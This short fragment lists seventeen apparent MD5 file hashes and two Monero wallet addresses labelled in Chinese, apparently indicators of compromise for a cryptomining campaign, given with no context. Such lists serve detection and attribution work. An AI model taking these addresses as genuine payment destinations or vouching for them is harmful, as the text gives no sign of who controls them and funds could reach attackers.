5eaa3c2b187a4fa71718be57b0e704c9 8cf543527e0af3b0ec11f4a5b5970810 36254048a516eda1a13fab81b6123119 0a8aac558c77f9f49b64818d7ab12000 59beb43a9319cbc2b3f3c59303989111 ce8fdec586e258ef340428025e4e44fa e4284f80b9066adc55079e8e564f448c 2f402cde33437d335f312a98b366c3c8 25a579dcc0cd6a70a56c7a4a0b8a1198 2d1159d7dc145192e55cd05a13408e9b 2dd8a0213893a26f69e6ae56d2b58d9d 0d8838116a25b6987bf83214c1058aad 0c883e5bbbbb01c4b32121cfa876d9d6 2d26ecc1fdcdad62e608a9de2542a1a6 27c91887f44bd92fb5538bc249d0e024 96b0f85c37c1523f054c269131755808 028f24eb796b1bb20b85c7c708efa497 门罗币钱包： 49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh